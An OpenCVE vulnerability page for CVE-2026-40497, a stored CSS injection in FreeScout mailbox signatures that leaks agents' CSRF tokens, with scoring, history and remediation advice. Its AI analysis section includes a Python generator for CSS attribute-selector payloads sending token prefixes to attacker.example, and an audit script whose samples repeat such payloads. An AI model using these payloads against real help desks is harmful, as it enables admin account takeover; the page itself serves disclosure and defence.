Description
FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.213, FreeScout's `Helper::stripDangerousTags()` removes `<script>`, `<form>`, `<iframe>`, `<object>` but does NOT strip `<style>` tags. The mailbox signature field is saved via POST /mailbox/settings/{id} and later rendered unescaped via `{!! $conversation->getSignatureProcessed([], true) !!}` in conversation views. CSP allows `style-src * 'self' 'unsafe-inline'`, so injected inline styles execute freely. An attacker with access to mailbox settings (admin or agent with mailbox permission) can inject CSS attribute selectors to exfiltrate the CSRF token of any agent/admin who views a conversation in that mailbox. With the CSRF token, the attacker can perform any state-changing action as the victim (create admin accounts, change email/password, etc.) — privilege escalation from agent to admin.

This is the result of an incomplete fix of GHSA-jqjf-f566-485j. That advisory reported XSS via mailbox signature. The fix applied `Helper::stripDangerousTags()` to the signature before saving. However, `stripDangerousTags()` only removes `script`, `form`, `iframe`, and `object` tags — it does NOT strip `<style>` tags, leaving CSS injection possible. Version 1.8.213 contains an updated fix.
Published: 2026-04-21
Score: 8.1 High
EPSS: < 1% Very Low
KEV: No
Impact: Privilege Escalation via CSRF Token Theft
Action: Patch Immediately
AI Analysis

Impact

FreeScout does not strip <style> tags from mailbox signatures. A stored signature is rendered unescaped in conversation views and the CSP permits inline styles, so anyone who can edit a mailbox's settings can store CSS attribute selectors that leak the CSRF token of any agent or admin who views a conversation in that mailbox. With that token the attacker can perform state-changing actions as the victim, such as creating administrative accounts or changing email addresses and passwords, escalating from agent to administrator. The flaw is classified as CWE-79 (improper neutralization of input during web page generation, the XSS family) even though the injected content is CSS rather than script.
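
As an added example (not FreeScout's code and not from the advisory), the following Python models the sanitizer gap and the CSS attribute-selector exfiltration it leaves open. The tag-stripping regex is a simplified stand-in for Helper::stripDangerousTags(), not its implementation; the collector host attacker.example, the assumption that the token sits in an input named _token (the usual Laravel form field), the 40-character alphanumeric token and the victim-browser simulation are all constructed for the demo.

```python
"""Model of the <style> gap in a tag stripper and of CSS attribute-selector
token exfiltration. Added example; not FreeScout's code."""
import re
import string
from typing import Optional

# Element names the advisory says the pre-1.8.213 stripper removed, and the
# hardened list that also removes <style>. The regex is a simplified model,
# not Helper::stripDangerousTags() itself.
PRE_FIX_TAGS = ("script", "form", "iframe", "object")
HARDENED_TAGS = PRE_FIX_TAGS + ("style",)


def strip_dangerous_tags(html: str, tags=PRE_FIX_TAGS) -> str:
    """Drop each listed element together with its content, then any stray tags."""
    for tag in tags:
        html = re.sub(rf"<{tag}\b[^>]*>.*?</{tag}\s*>", "", html,
                      flags=re.IGNORECASE | re.DOTALL)
        html = re.sub(rf"</?{tag}\b[^>]*>", "", html, flags=re.IGNORECASE)
    return html


# Laravel CSRF tokens are 40 alphanumeric characters (assumption for the demo).
ALPHABET = string.ascii_letters + string.digits
COLLECTOR = "https://attacker.example/t"   # hypothetical attacker endpoint


def exfil_rules(known_prefix: str) -> str:
    """Build the <style> payload for one round: one rule per candidate next
    character. Assumes the token is in <input name="_token" value="...">."""
    # Hidden inputs are display:none by default; an unrendered element never
    # requests its background image, so the payload forces it to render.
    rules = ["input[name='_token']{display:block}"]
    for ch in ALPHABET:
        guess = known_prefix + ch
        rules.append(f"input[name='_token'][value^='{guess}']"
                     f"{{background:url({COLLECTOR}/{guess})}}")
    return "<style>" + "".join(rules) + "</style>"


def fired_request(css: str, victim_token: str) -> Optional[str]:
    """Simulate the victim's browser: the URL of the one selector whose
    prefix matches the real token value, or None if none match."""
    pattern = r"\[value\^='([^']*)'\]\{background:url\(([^)]*)\)\}"
    for prefix, url in re.findall(pattern, css):
        if victim_token.startswith(prefix):
            return url
    return None


def recover_token(victim_token: str, length: int = 40) -> str:
    """Attacker loop: re-save the signature with rules for the next position,
    read the leaked prefix from the collector log, repeat. Needs one victim
    page view per character, which is why a stored payload matters."""
    known = ""
    while len(known) < length:
        url = fired_request(exfil_rules(known), victim_token)
        if url is None:
            break
        known = url.rsplit("/", 1)[1]
    return known


if __name__ == "__main__":
    token = ("aZ9" * 13) + "q"            # constructed 40-char token
    signature = "<p>Regards</p>" + exfil_rules("") + "<script>x()</script>"
    print("pre-fix keeps <style>:", "<style>" in strip_dangerous_tags(signature))
    print("hardened strips it:", "<style" not in strip_dangerous_tags(signature, HARDENED_TAGS))
    print("recovered:", recover_token(token) == token)
```

The display override is needed because a hidden input is never rendered and an unrendered element does not fetch its background image. The prefix loop is why the stored location matters: each round leaks one character, and the attacker re-saves the signature between victim page views.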

Affected Systems

The vulnerability affects all FreeScout installations older than 1.8.213 (product freescout-help-desk:freescout, CPE cpe:2.3:a:freescout:freescout:*). Version 1.8.213 contains the updated fix.

Risk and Exploitability

The CVSS 3.1 base score is 8.1 (High). The vector AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N reflects a network-reachable, low-complexity attack that nonetheless needs an account with mailbox-settings rights (an admin, or an agent with permission on the mailbox) and a victim who opens a conversation in that mailbox; scope is changed because the stolen token is used against another user's account. EPSS is below 1% and the CVE is not in the CISA KEV catalog, so no exploitation in the wild has been recorded, although the SSVC assessment records a public proof of concept. Because the payload is stored in the signature, it fires for every agent or admin who views a conversation in the mailbox until it is removed; the attacker needs credentials only to plant and update it. A CSS attribute selector tests one value prefix per rule, so leaking a full token generally takes several victim page views with the signature updated in between, which the stored location provides.

Generated by OpenCVE AI on April 21, 2026 at 15:29 UTC.

Remediation

Vendor fix: upgrade to FreeScout 1.8.213 or later, which contains the updated fix described in the advisory. No vendor workaround for earlier versions is listed.

OpenCVE Recommended Actions

  • Update FreeScout to version 1.8.213 or later, which carries the corrected fix; the earlier fix for GHSA-jqjf-f566-485j only stripped script, form, iframe and object tags from the signature on save.
  • Limit mailbox settings modification rights to administrators only; remove this permission from agents if it is not needed.
  • Audit existing mailbox signatures on every install, including ones already upgraded: the advisory describes sanitization at save time, so a payload stored before the upgrade should be assumed to persist until the signature is re-saved or deleted. Remove any <style> elements or inline CSS and reset the signature to plain text or safe HTML.
  • Where a malicious signature is found, treat every agent and admin who could have viewed that mailbox's conversations as exposed: review user accounts for unexpected admin accounts and email or password changes, and force those users to re-authenticate so their sessions, and the CSRF tokens tied to them, are regenerated.
  • Enable an audit trail for signature changes so that any unauthorized modifications can be detected and rolled back.
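
As an added example, not part of OpenCVE's recommendations or FreeScout's tooling, this Python audit flags stored signatures that carry a <style> element, an inline style attribute, or a CSS attribute-probe selector of the kind used for token theft. The records are a constructed stand-in for whatever rows a given install keeps for mailbox signatures; the function takes (mailbox id, signature HTML) pairs so it can be fed from a database export.

```python
"""Audit stored mailbox signatures for embedded CSS. Added example; not
part of FreeScout or OpenCVE."""
import re
from typing import Dict, List, Tuple

# Browsers are case-insensitive and tolerate attributes after the tag name,
# so the patterns match on the tag/attribute name only.
PATTERNS: Dict[str, "re.Pattern"] = {
    "style element": re.compile(r"<style\b", re.IGNORECASE),
    "style attribute": re.compile(r"\sstyle\s*=", re.IGNORECASE),
    # [value^=...], [value$=...], [value*=...]: prefix/suffix/substring probes
    # against an attribute value, the building block of CSS exfiltration.
    "attribute-probe selector": re.compile(r"\[\s*\w+\s*[\^$*]=", re.IGNORECASE),
}


def audit_signature(html: str) -> List[str]:
    """Return the labels of every pattern found in one signature."""
    return [label for label, rx in PATTERNS.items() if rx.search(html)]


def audit_all(records: List[Tuple[int, str]]) -> List[Tuple[int, List[str]]]:
    """(mailbox_id, findings) for each signature that has any finding."""
    findings = []
    for mailbox_id, html in records:
        hits = audit_signature(html)
        if hits:
            findings.append((mailbox_id, hits))
    return findings


# Constructed sample rows; in practice export (id, signature) from the install.
SAMPLE_SIGNATURES = [
    (1, "<p>Kind regards,<br>Support Team</p>"),
    (2, "<p>Best,</p><style>input[name='_token'][value^='a']"
        "{background:url(https://attacker.example/a)}</style>"),
    (3, '<p style="color:#333">Thanks</p>'),
    (4, "<P>--</P><STYLE>@import url(https://attacker.example/x.css)</STYLE>"),
]

if __name__ == "__main__":
    for mailbox_id, hits in audit_all(SAMPLE_SIGNATURES):
        print(f"mailbox {mailbox_id}: {', '.join(hits)}")
```

Inline style attributes are flagged alongside <style> elements because the recommendation is to remove all embedded CSS, and a flagged signature with an attribute-probe selector is the case that warrants the account review above rather than just a cleanup.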

Generated by OpenCVE AI on April 21, 2026 at 15:29 UTC.

Advisories

No advisories yet.

History

Thu, 23 Apr 2026 16:45:00 +0000

Type: First Time appeared
Values Added: Freescout; Freescout freescout

Type: CPEs
Values Added: cpe:2.3:a:freescout:freescout:*:*:*:*:*:*:*:*

Type: Vendors & Products
Values Added: Freescout; Freescout freescout

Tue, 21 Apr 2026 14:15:00 +0000

Type: Metrics (ssvc)
Values Added: {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Tue, 21 Apr 2026 03:45:00 +0000

Type: First Time appeared
Values Added: Freescout Helpdesk; Freescout Helpdesk freescout

Type: Vendors & Products
Values Added: Freescout Helpdesk; Freescout Helpdesk freescout

Tue, 21 Apr 2026 02:45:00 +0000

Type: Description
Values Added: the description shown at the top of this page

Type: Title
Values Added: FreeScout Vulnerable to CSS Injection via Stored Style Tag in Mailbox Signature (CSRF Token Exfiltration)

Type: Weaknesses
Values Added: CWE-79

Type: References
Values Added:

Type: Metrics (cvssV3_1)
Values Added: {'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N'}

MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-21T13:25:21.103Z

Reserved: 2026-04-13T19:50:42.115Z

Link: CVE-2026-40497

Vulnrichment

Updated: 2026-04-21T13:25:08.199Z

NVD

Status: Analyzed

Published: 2026-04-21T03:16:08.403

Modified: 2026-04-23T16:32:04.787

Link: CVE-2026-40497

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-21T15:37:55Z

Weaknesses